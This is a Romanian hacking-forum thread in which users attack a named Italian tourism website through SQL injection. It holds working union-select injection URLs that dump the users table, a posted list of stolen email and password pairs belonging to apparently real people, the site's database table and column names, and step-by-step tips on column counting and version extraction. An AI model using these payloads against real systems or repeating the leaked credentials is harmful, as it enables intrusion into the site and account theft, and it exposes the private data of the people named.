Jump to content
Flubber

SQL Injection

By Flubber, in Exploituri

Recommended Posts

Flubber Newbie

Flubber

Posted
  • Author
Posted

voi reusiti sa aflati ceva mai mult de la site-u asta (http://www.luccatourist.it/notizie.php?id=230)

am reusit decat versiunea: http://www.luccatourist.it/notizie.php?id=-230+union+all+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41--

daca puteti mai multe....postati

thx

Link to comment
Share on other sites
Guest Praetorian

Guest Praetorian

Posted
Posted

Daca aflai versiunea iti dadeai seama ce sa faci!!

Foloseai unhex(hex(version()))

[Database]

aptlucca

[Tables of DB]

NL_iscritti,NL_iscritti_gruppi,NL_messaggi,

NL_messaggi_gruppi,NL_opzioni,_NL_messaggi_gruppi,

_OLDNL_iscritti,_OLDNL_iscritti_gruppi,_OLDNL_messaggi,

_aat_1,_aat_2,_aat_3,

_banner_copy,_banner_old,banner,

banner_altritesti,comuni,costanti,

diario,dv_foto,dv_viaggi,

dv_voti,eventi,foto,

foto_carrello,foto_categorie,foto_gruppi,

foto_richieste,fotoxcategorie,guide,

informazioni,informazioni_gruppi,itinerari,

links,links_gruppi,mappe,

notizie,notizie_copy,poster,

pubblicazioni,ristoranti,ristoranti_gruppi,

ristoranti_gruppi_unione,s_comunicati,s_rassegna,

salastampa,salastampa_categorie,salastampa_foto,

sezioni,stampa,stampadoc,

strutture,strutture_gruppi,testi,

testi_introduttivi,utenti,v_foto,

visitare,visitare_gruppi,zone

[columns of utenti]

idutente,userid,password,

denominazione,testata,

professione,approvato,t_admin,

t_sito,t_newsletter,t_stampa,

t_viaggi,ultimologin,tipo,data,ora,email

[ Email , Password ]

comunicazione@luccaturismo.it:3hc5eneb,

emilio.orsi@lucense.it:evtcunv0,

sbresdin@orange.fr:usxo7zsd,

s.wiedenstritt@doradocom.com:ca2sp50d,

riccardo.oldani@itinerarieluoghi.it:vcio4jts,

andrea.mariani@lucense.it:lunet,

restivo.renee@gmail.com:7xrdfbib,

vania.brogi@tiscali.it:wbr4raxn,

d.deponti@alice.it:qgugod5r,

dhayes@emphasis.net:0ahmipj4,

emilio.orsi@lucense.it:ztue557j,

emilio.orsi@lucense.it:qps5yc00

Link to comment
Share on other sites
redking Newbie

redking

Posted
Posted

da paxnWo stiu treaba asta....dar nu stiu sa extrag manual tabelele din information_schema...

L.E.:m-am documentat si am invatzat cum se extrag manual datele din information_schema...mai dura e faza daca apar magic_quotes-urile...

  • Upvote 1
Link to comment
Share on other sites
redking Newbie

redking

Posted
Posted

cu ce mi-am batut capu` ---->

materia prima:

http://www.luccatourist.it/notizie.php?id=-1+union+all+select+1,2,unhex(hex(group_concat(column_name))),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41+from+information_schema.columns+where+table_schema=0x6170746c75636361+and+table_name=0x7574656e7469

si produsul finit:

http://www.luccatourist.it/notizie.php?id=-1+union+all+select+1,2,unhex(hex(group_concat(email,0x3a,password))),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41+from+utenti

Link to comment
Share on other sites
Flubber Newbie

Flubber

Posted
  • Author
Posted
Daca aflai versiunea iti dadeai seama ce sa faci!!

Foloseai unhex(hex(version()))

scuze, am uitat sa inlocuiesc in link o cifra (vulnerabila) cu unhex(hex(@@version))

da paxnWo stiu treaba asta....dar nu stiu sa extrag manual tabelele din information_schema...

exact la fel, cand am incercat sa citesc "information_schema.schemata" imi dadea eroare

Link to comment
Share on other sites
redking Newbie

redking

Posted
Posted

inseamna ca nu ai gasit numaru corect al coloanelor....decat sa incerci cu order by....mai bine incearca "union+all+select+1,2,3,...." tot adaugi pana cand vei vedea ca nu-ti mai da eroarea de genu "the selected statement....."...iti afiseaza altceva....daca nu intelegi da-mi un pm cu id-u tau...si te ajut....

Link to comment
Share on other sites
brugner Newbie

brugner

Posted
Posted
inseamna ca nu ai gasit numaru corect al coloanelor....decat sa incerci cu order by....mai bine incearca "union+all+select+1,2,3,...." tot adaugi pana cand vei vedea ca nu-ti mai da eroarea de genu "the selected statement....."...iti afiseaza altceva....daca nu intelegi da-mi un pm cu id-u tau...si te ajut....

Mersi mult pentru ajutor... pana sa ma "luminez" eu au patch-uit problema :( ...

Link to comment
Share on other sites
Guest Praetorian

Guest Praetorian

Posted
Posted

La majoritatea site-urilor vuln sql.. daca iti arata la order by 1-- cumva ,iar la order by 2-- diferit inseamna ca are doar 1 coloana.

link-ul tau de ex este:

index.php?id=12 union all select 1--

Se poate sa nu iti returneze nimic, sau eroarea normala.

In loc de 1 pui [ version() ], chiar daca nu iti apare, te uiti in sursa pagini.

Daca nu o gasesti nici acolo pui un " - " in fata lui 12.

index.php?id=-12 union all select 1--

Daca nici acum nu iti merge trebuie sa folosesti unhex(hex(version()))

ex:

index.php?id=-12 union all select unhex(hex(version()))--

Daca nici acum nu merge inseamna ca nu poti folosi sqli si trebuie sa faci blind sqli.

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...